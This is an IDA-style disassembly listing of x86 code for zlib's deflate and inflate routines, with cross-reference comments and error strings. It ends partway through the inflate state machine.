mov ecx, [esi+38h]
mov cl, [eax+ecx-1]
mov edi, [esi+16A4h]
lea eax, [esi+16A0h]
mov edx, [eax]
mov [edi+edx*2], bx
mov edi, [eax]
mov edx, [esi+1698h]
mov [edx+edi], cl
inc dword ptr [eax]
movzx eax, cl
lea eax, [esi+eax*4+94h]
inc word ptr [eax]
mov [esi+68h], ebx
loc_9ADF71: ; CODE XREF: .text:009ADF36�j
mov ecx, [esi+5Ch]
cmp ecx, ebx
jl short loc_9ADF7F
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9ADF81
; ---------------------------------------------------------------------------
loc_9ADF7F: ; CODE XREF: .text:009ADF76�j
xor eax, eax
loc_9ADF81: ; CODE XREF: .text:009ADF7D�j
xor edx, edx
cmp dword ptr [esp+1Ch], 4
setz dl
push edx
mov edx, [esi+6Ch]
sub edx, ecx
push edx
push eax
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
mov eax, [esi]
cmp [eax+10h], ebx
jnz short loc_9ADFC3
cmp dword ptr [esp+1Ch], 4
jnz loc_9ADE8C
push 2
pop eax
jmp loc_9ADE8E
; ---------------------------------------------------------------------------
loc_9ADFC3: ; CODE XREF: .text:009ADFAE�j
xor eax, eax
cmp dword ptr [esp+1Ch], 4
setz al
lea eax, [eax+eax+1]
jmp loc_9ADE8E
; =============== S U B R O U T I N E =======================================
sub_9ADFD6 proc near ; CODE XREF: sub_9AE031+96�p
; sub_9AF810+151�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
cmp ecx, edx
jz short loc_9AE02D
mov eax, [ecx+1Ch]
cmp eax, edx
jz short loc_9AE02D
mov [eax+1Ch], edx
mov [ecx+14h], edx
mov [ecx+8], edx
mov [ecx+18h], edx
mov dword ptr [ecx+30h], 1
lea ecx, [eax+530h]
mov [eax], edx
mov [eax+4], edx
mov [eax+0Ch], edx
mov dword ptr [eax+14h], 8000h
mov [eax+20h], edx
mov [eax+28h], edx
mov [eax+2Ch], edx
mov [eax+30h], edx
mov [eax+38h], edx
mov [eax+3Ch], edx
mov [eax+6Ch], ecx
mov [eax+50h], ecx
mov [eax+4Ch], ecx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9AE02D: ; CODE XREF: sub_9ADFD6+8�j
; sub_9ADFD6+F�j
push 0FFFFFFFEh
pop eax
retn
sub_9ADFD6 endp
; =============== S U B R O U T I N E =======================================
sub_9AE031 proc near ; CODE XREF: sub_9AF64C+116�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_8]
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_9AE0DF
cmp byte ptr [eax], 31h
jnz loc_9AE0DF
cmp [esp+8+arg_C], 38h
jnz loc_9AE0DF
mov esi, [esp+8+arg_0]
cmp esi, edi
jz short loc_9AE0DB
cmp [esi+20h], edi
mov [esi+18h], edi
jnz short loc_9AE06F
mov dword ptr [esi+20h], offset loc_9B15D7
mov [esi+28h], edi
loc_9AE06F: ; CODE XREF: sub_9AE031+32�j
cmp [esi+24h], edi
jnz short loc_9AE07B
mov dword ptr [esi+24h], offset loc_9B15E9
loc_9AE07B: ; CODE XREF: sub_9AE031+41�j
push 2530h
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
cmp eax, edi
jnz short loc_9AE093
push 0FFFFFFFCh
jmp short loc_9AE0E1
; ---------------------------------------------------------------------------
loc_9AE093: ; CODE XREF: sub_9AE031+5C�j
mov ecx, [esp+8+arg_4]
cmp ecx, edi
mov [esi+1Ch], eax
jge short loc_9AE0A5
mov [eax+8], edi
neg ecx
jmp short loc_9AE0B6
; ---------------------------------------------------------------------------
loc_9AE0A5: ; CODE XREF: sub_9AE031+6B�j
mov edx, ecx
sar edx, 4
inc edx
cmp ecx, 30h
mov [eax+8], edx
jge short loc_9AE0B6
and ecx, 0Fh
loc_9AE0B6: ; CODE XREF: sub_9AE031+72�j
; sub_9AE031+80�j
cmp ecx, 8
jl short loc_9AE0CF
cmp ecx, 0Fh
jg short loc_9AE0CF
push esi
mov [eax+24h], ecx
mov [eax+34h], edi
call sub_9ADFD6
pop ecx
jmp short loc_9AE0E2
; ---------------------------------------------------------------------------
loc_9AE0CF: ; CODE XREF: sub_9AE031+88�j
; sub_9AE031+8D�j
push eax
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
pop ecx
mov [esi+1Ch], edi
loc_9AE0DB: ; CODE XREF: sub_9AE031+2A�j
push 0FFFFFFFEh
jmp short loc_9AE0E1
; ---------------------------------------------------------------------------
loc_9AE0DF: ; CODE XREF: sub_9AE031+A�j
; sub_9AE031+13�j ...
push 0FFFFFFFAh
loc_9AE0E1: ; CODE XREF: sub_9AE031+60�j
; sub_9AE031+AC�j
pop eax
loc_9AE0E2: ; CODE XREF: sub_9AE031+9C�j
pop edi
pop esi
retn
sub_9AE031 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE0E5 proc near ; CODE XREF: sub_9AE1BD+10CA�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [edi+1Ch]
cmp dword ptr [esi+34h], 0
mov ebx, eax
jnz short loc_9AE117
mov ecx, [esi+24h]
xor eax, eax
inc eax
shl eax, cl
push 1
push eax
push dword ptr [edi+28h]
call dword ptr [edi+20h]
add esp, 0Ch
test eax, eax
mov [esi+34h], eax
jnz short loc_9AE117
inc eax
jmp loc_9AE1B9
; ---------------------------------------------------------------------------
loc_9AE117: ; CODE XREF: sub_9AE0E5+F�j
; sub_9AE0E5+2A�j
xor eax, eax
cmp [esi+28h], eax
jnz short loc_9AE12F
mov ecx, [esi+24h]
xor edx, edx
inc edx
shl edx, cl
mov [esi+30h], eax
mov [esi+2Ch], eax
mov [esi+28h], edx
loc_9AE12F: ; CODE XREF: sub_9AE0E5+37�j
sub ebx, [edi+10h]
mov eax, [esi+28h]
cmp ebx, eax
jb short loc_9AE157
mov ecx, [edi+0Ch]
push eax
sub ecx, eax
push ecx
push dword ptr [esi+34h]
call sub_9B323A ; memcpy
add esp, 0Ch
and dword ptr [esi+30h], 0
loc_9AE14F: ; CODE XREF: sub_9AE0E5+B3�j
mov eax, [esi+28h]
mov [esi+2Ch], eax
jmp short loc_9AE1B7
; ---------------------------------------------------------------------------
loc_9AE157: ; CODE XREF: sub_9AE0E5+52�j
sub eax, [esi+30h]
cmp eax, ebx
mov [ebp+var_4], eax
jbe short loc_9AE164
mov [ebp+var_4], ebx
loc_9AE164: ; CODE XREF: sub_9AE0E5+7A�j
mov eax, [edi+0Ch]
push [ebp+var_4]
sub eax, ebx
push eax
mov eax, [esi+34h]
add eax, [esi+30h]
push eax
call sub_9B323A ; memcpy
mov eax, [ebp+var_4]
add esp, 0Ch
sub ebx, eax
jz short loc_9AE19A
mov eax, [edi+0Ch]
push ebx
sub eax, ebx
push eax
push dword ptr [esi+34h]
call sub_9B323A ; memcpy
add esp, 0Ch
mov [esi+30h], ebx
jmp short loc_9AE14F
; ---------------------------------------------------------------------------
loc_9AE19A: ; CODE XREF: sub_9AE0E5+9C�j
add [esi+30h], eax
mov ecx, [esi+30h]
mov edx, [esi+28h]
cmp ecx, edx
jnz short loc_9AE1AB
and dword ptr [esi+30h], 0
loc_9AE1AB: ; CODE XREF: sub_9AE0E5+C0�j
mov ecx, [esi+2Ch]
cmp ecx, edx
jnb short loc_9AE1B7
add ecx, eax
mov [esi+2Ch], ecx
loc_9AE1B7: ; CODE XREF: sub_9AE0E5+70�j
; sub_9AE0E5+CB�j
xor eax, eax
loc_9AE1B9: ; CODE XREF: sub_9AE0E5+2D�j
pop esi
pop ebx
leave
retn
sub_9AE0E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE1BD proc near ; CODE XREF: sub_9AF810+EF�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_0]
push ebx
xor ecx, ecx
cmp eax, ecx
push esi
push edi
jz loc_9AF208
mov esi, [eax+1Ch]
cmp esi, ecx
jz loc_9AF208
cmp [eax+0Ch], ecx
jz loc_9AF208
cmp [eax], ecx
jnz short loc_9AE1F4
cmp [eax+4], ecx
jnz loc_9AF208
loc_9AE1F4: ; CODE XREF: sub_9AE1BD+2C�j
cmp dword ptr [esi], 0Bh
jnz short loc_9AE1FF
mov dword ptr [esi], 0Ch
loc_9AE1FF: ; CODE XREF: sub_9AE1BD+3A�j
mov edx, [eax+0Ch]
mov edi, [eax]
mov ebx, [esi+38h]
mov [ebp+var_1C], edx
mov edx, [eax+10h]
mov eax, [eax+4]
mov [ebp+var_4], edi
mov edi, [esi+3Ch]
mov [ebp+var_14], edx
mov [ebp+var_8], eax
mov [ebp+var_10], ebx
mov [ebp+var_2C], eax
mov [ebp+var_20], edx
mov [ebp+var_24], ecx
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE22D: ; CODE XREF: sub_9AE1BD+1045�j
jmp off_9AF32D[eax*4]
loc_9AE234: ; DATA XREF: .text:off_9AF32D�o
mov eax, [esi+8]
test eax, eax
jnz short loc_9AE268
mov dword ptr [esi], 0Ch
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE246: ; CODE XREF: sub_9AE1BD+AE�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov ecx, [ebp+var_4]
movzx edx, byte ptr [ecx]
dec [ebp+var_8]
mov ecx, edi
shl edx, cl
add ebx, edx
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AE268: ; CODE XREF: sub_9AE1BD+7C�j
cmp edi, 10h
jb short loc_9AE246
test al, 2
jz short loc_9AE2B2
cmp ebx, 8B1Fh
jnz short loc_9AE2B2
xor edi, edi
push edi
push edi
push edi
call sub_9AD46B
mov [esi+18h], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_18], 1Fh
mov [ebp+var_17], 8Bh
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 18h
xor ebx, ebx
mov [esi+18h], eax
mov [ebp+var_10], ebx
mov dword ptr [esi], 1
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE2B2: ; CODE XREF: sub_9AE1BD+B2�j
; sub_9AE1BD+BA�j
mov eax, [esi+20h]
and dword ptr [esi+10h], 0
test eax, eax
jz short loc_9AE2C1
or dword ptr [eax+30h], 0FFFFFFFFh
loc_9AE2C1: ; CODE XREF: sub_9AE1BD+FE�j
test byte ptr [esi+8], 1
jz loc_9AE34D
mov eax, ebx
and eax, 0FFh
shl eax, 8
mov ecx, ebx
shr ecx, 8
add eax, ecx
push 1Fh
xor edx, edx
pop ecx
div ecx
test edx, edx
jnz short loc_9AE34D
mov eax, ebx
and al, 0Fh
cmp al, 8
jnz loc_9AE38B
shr ebx, 4
mov ecx, ebx
and ecx, 0Fh
add ecx, 8
sub edi, 4
cmp ecx, [esi+24h]
mov [ebp+var_10], ebx
jbe short loc_9AE318
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidWindowS ; "invalid window size"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE318: ; CODE XREF: sub_9AE1BD+14A�j
xor eax, eax
xor edi, edi
inc eax
shl eax, cl
push edi
push edi
push edi
mov [esi+14h], eax
call sub_9ACEF5
mov ecx, [ebp+arg_0]
shr ebx, 8
not ebx
and ebx, 2
or ebx, 9
mov [esi+18h], eax
mov [ecx+30h], eax
add esp, 0Ch
mov [esi], ebx
xor ebx, ebx
mov [ebp+var_10], ebx
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE34D: ; CODE XREF: sub_9AE1BD+108�j
; sub_9AE1BD+128�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aIncorrectHeade ; "incorrect header check"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE35C: ; CODE XREF: sub_9AE1BD+1C4�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AE37E: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF331�o
cmp edi, 10h
jb short loc_9AE35C
cmp bl, 8
mov [esi+10h], ebx
jz short loc_9AE39A
loc_9AE38B: ; CODE XREF: sub_9AE1BD+130�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aUnknownCompres ; "unknown compression method"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE39A: ; CODE XREF: sub_9AE1BD+1CC�j
test bh, 0E0h
jz short loc_9AE3AE
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aUnknownHeaderF ; "unknown header flags set"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE3AE: ; CODE XREF: sub_9AE1BD+1E0�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE3BF
mov ecx, ebx
shr ecx, 8
and ecx, 1
mov [eax], ecx
loc_9AE3BF: ; CODE XREF: sub_9AE1BD+1F6�j
test byte ptr [esi+11h], 2
jz short loc_9AE3E2
mov [ebp+var_18], bl
push 2
lea eax, [ebp+var_18]
shr ebx, 8
push eax
mov [ebp+var_17], bl
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 0Ch
mov [esi+18h], eax
loc_9AE3E2: ; CODE XREF: sub_9AE1BD+206�j
xor ebx, ebx
xor edi, edi
mov dword ptr [esi], 2
jmp short loc_9AE40D
; ---------------------------------------------------------------------------
loc_9AE3EE: ; CODE XREF: sub_9AE1BD+253�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE40D: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; sub_9AE1BD+22F�j
; DATA XREF: ...
cmp edi, 20h
jb short loc_9AE3EE
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE41C
mov [eax+4], ebx
loc_9AE41C: ; CODE XREF: sub_9AE1BD+25A�j
test byte ptr [esi+11h], 2
jz short loc_9AE44F
mov eax, ebx
shr eax, 8
mov [ebp+var_17], al
mov eax, ebx
shr eax, 10h
mov [ebp+var_16], al
mov [ebp+var_18], bl
push 4
lea eax, [ebp+var_18]
shr ebx, 18h
push eax
mov [ebp+var_15], bl
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 0Ch
mov [esi+18h], eax
loc_9AE44F: ; CODE XREF: sub_9AE1BD+263�j
xor ebx, ebx
xor edi, edi
mov dword ptr [esi], 3
jmp short loc_9AE47A
; ---------------------------------------------------------------------------
loc_9AE45B: ; CODE XREF: sub_9AE1BD+2C0�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE47A: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; sub_9AE1BD+29C�j
; DATA XREF: ...
cmp edi, 10h
jb short loc_9AE45B
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE49C
mov ecx, ebx
and ecx, 0FFh
mov [eax+8], ecx
mov ecx, [esi+20h]
mov eax, ebx
shr eax, 8
mov [ecx+0Ch], eax
loc_9AE49C: ; CODE XREF: sub_9AE1BD+2C7�j
test byte ptr [esi+11h], 2
jz short loc_9AE4BF
mov [ebp+var_18], bl
push 2
lea eax, [ebp+var_18]
shr ebx, 8
push eax
mov [ebp+var_17], bl
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 0Ch
mov [esi+18h], eax
loc_9AE4BF: ; CODE XREF: sub_9AE1BD+2E3�j
xor ebx, ebx
mov [ebp+var_10], ebx
xor edi, edi
mov dword ptr [esi], 4
loc_9AE4CC: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF33D�o
test byte ptr [esi+11h], 4
jnz loc_9AE558
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE4E1
and dword ptr [eax+10h], 0
loc_9AE4E1: ; CODE XREF: sub_9AE1BD+31E�j
; sub_9AE1BD+3D7�j
mov dword ptr [esi], 5
loc_9AE4E7: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF341�o
test byte ptr [esi+11h], 4
jz loc_9AE5DE
mov edx, [esi+40h]
mov eax, [ebp+var_8]
cmp edx, eax
mov [ebp+var_C], edx
jbe short loc_9AE501
mov [ebp+var_C], eax
loc_9AE501: ; CODE XREF: sub_9AE1BD+33F�j
cmp [ebp+var_C], 0
jz loc_9AE5D4
mov ecx, [esi+20h]
test ecx, ecx
jz loc_9AE5AE
mov eax, [ecx+10h]
test eax, eax
mov [ebp+var_28], eax
jz loc_9AE5AE
mov eax, [ecx+14h]
mov ecx, [ecx+18h]
sub eax, edx
mov edx, [ebp+var_C]
add edx, eax
cmp edx, ecx
jbe short loc_9AE599
sub ecx, eax
jmp short loc_9AE59C
; ---------------------------------------------------------------------------
loc_9AE539: ; CODE XREF: sub_9AE1BD+39E�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE558: ; CODE XREF: sub_9AE1BD+313�j
cmp edi, 10h
jb short loc_9AE539
mov eax, [esi+20h]
test eax, eax
mov [esi+40h], ebx
jz short loc_9AE56A
mov [eax+14h], ebx
loc_9AE56A: ; CODE XREF: sub_9AE1BD+3A8�j
test byte ptr [esi+11h], 2
jz short loc_9AE58D
mov [ebp+var_18], bl
push 2
lea eax, [ebp+var_18]
shr ebx, 8
push eax
mov [ebp+var_17], bl
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 0Ch
mov [esi+18h], eax
loc_9AE58D: ; CODE XREF: sub_9AE1BD+3B1�j
xor ebx, ebx
mov [ebp+var_10], ebx
xor edi, edi
jmp loc_9AE4E1
; ---------------------------------------------------------------------------
loc_9AE599: ; CODE XREF: sub_9AE1BD+376�j
mov ecx, [ebp+var_C]
loc_9AE59C: ; CODE XREF: sub_9AE1BD+37A�j
push ecx
mov ecx, [ebp+var_28]
push [ebp+var_4]
add ecx, eax
push ecx
call sub_9B323A ; memcpy
add esp, 0Ch
loc_9AE5AE: ; CODE XREF: sub_9AE1BD+353�j
; sub_9AE1BD+361�j
test byte ptr [esi+11h], 2
jz short loc_9AE5C8
push [ebp+var_C]
push [ebp+var_4]
push dword ptr [esi+18h]
call sub_9AD46B
add esp, 0Ch
mov [esi+18h], eax
loc_9AE5C8: ; CODE XREF: sub_9AE1BD+3F5�j
mov eax, [ebp+var_C]
sub [ebp+var_8], eax
add [ebp+var_4], eax
sub [esi+40h], eax
loc_9AE5D4: ; CODE XREF: sub_9AE1BD+348�j
cmp dword ptr [esi+40h], 0
jnz loc_9AF24B
loc_9AE5DE: ; CODE XREF: sub_9AE1BD+32E�j
and dword ptr [esi+40h], 0
mov dword ptr [esi], 6
loc_9AE5E8: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF345�o
test byte ptr [esi+11h], 8
jz short loc_9AE666
cmp [ebp+var_8], 0
jz loc_9AF24B
xor ecx, ecx
loc_9AE5FA: ; CODE XREF: sub_9AE1BD+477�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [ecx+eax]
inc ecx
mov [ebp+var_C], ecx
mov ecx, [esi+20h]
test ecx, ecx
mov [ebp+var_28], eax
jz short loc_9AE62A
mov edx, [ecx+1Ch]
test edx, edx
mov [ebp+var_30], edx
jz short loc_9AE62A
mov edx, [esi+40h]
cmp edx, [ecx+20h]
jnb short loc_9AE62A
mov ecx, [ebp+var_30]
mov [ecx+edx], al
inc dword ptr [esi+40h]
loc_9AE62A: ; CODE XREF: sub_9AE1BD+450�j
; sub_9AE1BD+45A�j ...
test eax, eax
jz short loc_9AE636
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_8]
jb short loc_9AE5FA
loc_9AE636: ; CODE XREF: sub_9AE1BD+46F�j
test byte ptr [esi+11h], 2
jz short loc_9AE653
push [ebp+var_C]
push [ebp+var_4]
push dword ptr [esi+18h]
call sub_9AD46B
mov [esi+18h], eax
mov eax, [ebp+var_28]
add esp, 0Ch
loc_9AE653: ; CODE XREF: sub_9AE1BD+47D�j
mov ecx, [ebp+var_C]
sub [ebp+var_8], ecx
add [ebp+var_4], ecx
test eax, eax
jnz loc_9AF24B
jmp short loc_9AE671
; ---------------------------------------------------------------------------
loc_9AE666: ; CODE XREF: sub_9AE1BD+42F�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE671
and dword ptr [eax+1Ch], 0
loc_9AE671: ; CODE XREF: sub_9AE1BD+4A7�j
; sub_9AE1BD+4AE�j
and dword ptr [esi+40h], 0
mov dword ptr [esi], 7
loc_9AE67B: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF349�o
test byte ptr [esi+11h], 10h
jz short loc_9AE6FD
cmp [ebp+var_8], 0
jz loc_9AF24B
and [ebp+var_C], 0
loc_9AE68F: ; CODE XREF: sub_9AE1BD+50E�j
mov ecx, [ebp+var_C]
mov eax, [ebp+var_4]
movzx eax, byte ptr [ecx+eax]
mov ecx, [esi+20h]
inc [ebp+var_C]
test ecx, ecx
mov [ebp+var_28], eax
jz short loc_9AE6C1
mov edx, [ecx+24h]
test edx, edx
mov [ebp+var_30], edx
jz short loc_9AE6C1
mov edx, [esi+40h]
cmp edx, [ecx+28h]
jnb short loc_9AE6C1
mov ecx, [ebp+var_30]
mov [ecx+edx], al
inc dword ptr [esi+40h]
loc_9AE6C1: ; CODE XREF: sub_9AE1BD+4E7�j
; sub_9AE1BD+4F1�j ...
test eax, eax
jz short loc_9AE6CD
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_8]
jb short loc_9AE68F
loc_9AE6CD: ; CODE XREF: sub_9AE1BD+506�j
test byte ptr [esi+11h], 2
jz short loc_9AE6EA
push [ebp+var_C]
push [ebp+var_4]
push dword ptr [esi+18h]
call sub_9AD46B
mov [esi+18h], eax
mov eax, [ebp+var_28]
add esp, 0Ch
loc_9AE6EA: ; CODE XREF: sub_9AE1BD+514�j
mov ecx, [ebp+var_C]
sub [ebp+var_8], ecx
add [ebp+var_4], ecx
test eax, eax
jnz loc_9AF24B
jmp short loc_9AE708
; ---------------------------------------------------------------------------
loc_9AE6FD: ; CODE XREF: sub_9AE1BD+4C2�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE708
and dword ptr [eax+24h], 0
loc_9AE708: ; CODE XREF: sub_9AE1BD+53E�j
; sub_9AE1BD+545�j
mov dword ptr [esi], 8
loc_9AE70E: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF34D�o
test byte ptr [esi+11h], 2
jz short loc_9AE75F
jmp short loc_9AE738
; ---------------------------------------------------------------------------
loc_9AE716: ; CODE XREF: sub_9AE1BD+57E�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AE738: ; CODE XREF: sub_9AE1BD+557�j
cmp edi, 10h
jb short loc_9AE716
mov eax, [esi+18h]
and eax, 0FFFFh
cmp ebx, eax
jz short loc_9AE758
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aHeaderCrcMisma ; "header crc mismatch"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE758: ; CODE XREF: sub_9AE1BD+58A�j
xor ebx, ebx
mov [ebp+var_10], ebx
xor edi, edi
loc_9AE75F: ; CODE XREF: sub_9AE1BD+555�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9AE77A
mov edx, [esi+10h]
xor ecx, ecx
inc ecx
sar edx, 9
and edx, ecx
mov [eax+2Ch], edx
mov eax, [esi+20h]
mov [eax+30h], ecx
loc_9AE77A: ; CODE XREF: sub_9AE1BD+5A7�j
xor eax, eax
push eax
push eax
push eax
call sub_9AD46B
mov ecx, [ebp+arg_0]
mov [esi+18h], eax
add esp, 0Ch
mov [ecx+30h], eax
loc_9AE790: ; CODE XREF: sub_9AE1BD+785�j
; sub_9AE1BD+CC3�j
mov dword ptr [esi], 0Bh
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE79B: ; CODE XREF: sub_9AE1BD+603�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AE7BD: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF351�o
cmp edi, 20h
jb short loc_9AE79B
mov eax, ebx
and eax, 0FF00h
mov ecx, ebx
shl ecx, 10h
add eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp+var_10+2]
shl eax, 8
shr ebx, 18h
add eax, ecx
mov ecx, [ebp+arg_0]
add eax, ebx
mov [esi+18h], eax
mov [ecx+30h], eax
xor ebx, ebx
xor edi, edi
mov dword ptr [esi], 0Ah
jmp short loc_9AE7F7
; ---------------------------------------------------------------------------
loc_9AE7F4: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF355�o
mov ecx, [ebp+arg_0]
loc_9AE7F7: ; CODE XREF: sub_9AE1BD+635�j
cmp dword ptr [esi+0Ch], 0
jz loc_9AF210
xor eax, eax
push eax
push eax
push eax
call sub_9ACEF5
mov ecx, [ebp+arg_0]
mov [esi+18h], eax
mov [ecx+30h], eax
add esp, 0Ch
mov dword ptr [esi], 0Bh
loc_9AE81D: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF359�o
cmp [ebp+arg_4], 5
jz loc_9AF24B
loc_9AE827: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF35D�o
cmp dword ptr [esi+4], 0
jz short loc_9AE863
mov ecx, edi
and ecx, 7
shr ebx, cl
sub edi, ecx
mov dword ptr [esi], 18h
mov [ebp+var_10], ebx
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE844: ; CODE XREF: sub_9AE1BD+6A9�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE863: ; CODE XREF: sub_9AE1BD+66E�j
cmp edi, 3
jb short loc_9AE844
mov eax, ebx
and eax, 1
shr ebx, 1
mov [esi+4], eax
mov eax, ebx
and eax, 3
dec edi
sub eax, 0
jz short loc_9AE8C4
dec eax
jz short loc_9AE8A0
dec eax
jz short loc_9AE898
dec eax
jnz short loc_9AE8CA
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov dword ptr [esi], 1Bh
jmp short loc_9AE8CA
; ---------------------------------------------------------------------------
loc_9AE898: ; CODE XREF: sub_9AE1BD+6C4�j
mov dword ptr [esi], 0Fh
jmp short loc_9AE8CA
; ---------------------------------------------------------------------------
loc_9AE8A0: ; CODE XREF: sub_9AE1BD+6C1�j
mov dword ptr [esi+4Ch], offset dword_9A4280
mov dword ptr [esi+54h], 9
mov dword ptr [esi+50h], offset dword_9A4A80
mov dword ptr [esi+58h], 5
mov dword ptr [esi], 12h
jmp short loc_9AE8CA
; ---------------------------------------------------------------------------
loc_9AE8C4: ; CODE XREF: sub_9AE1BD+6BE�j
mov dword ptr [esi], 0Dh
loc_9AE8CA: ; CODE XREF: sub_9AE1BD+6C7�j
; sub_9AE1BD+6D9�j ...
shr ebx, 2
dec edi
mov [ebp+var_10], ebx
dec edi
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE8D7: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF361�o
mov ecx, edi
and ecx, 7
shr ebx, cl
sub edi, ecx
jmp short loc_9AE901
; ---------------------------------------------------------------------------
loc_9AE8E2: ; CODE XREF: sub_9AE1BD+74A�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE901: ; CODE XREF: sub_9AE1BD+723�j
cmp edi, 20h
mov [ebp+var_10], ebx
jb short loc_9AE8E2
mov ecx, ebx
mov eax, ebx
not ecx
and eax, 0FFFFh
shr ecx, 10h
cmp eax, ecx
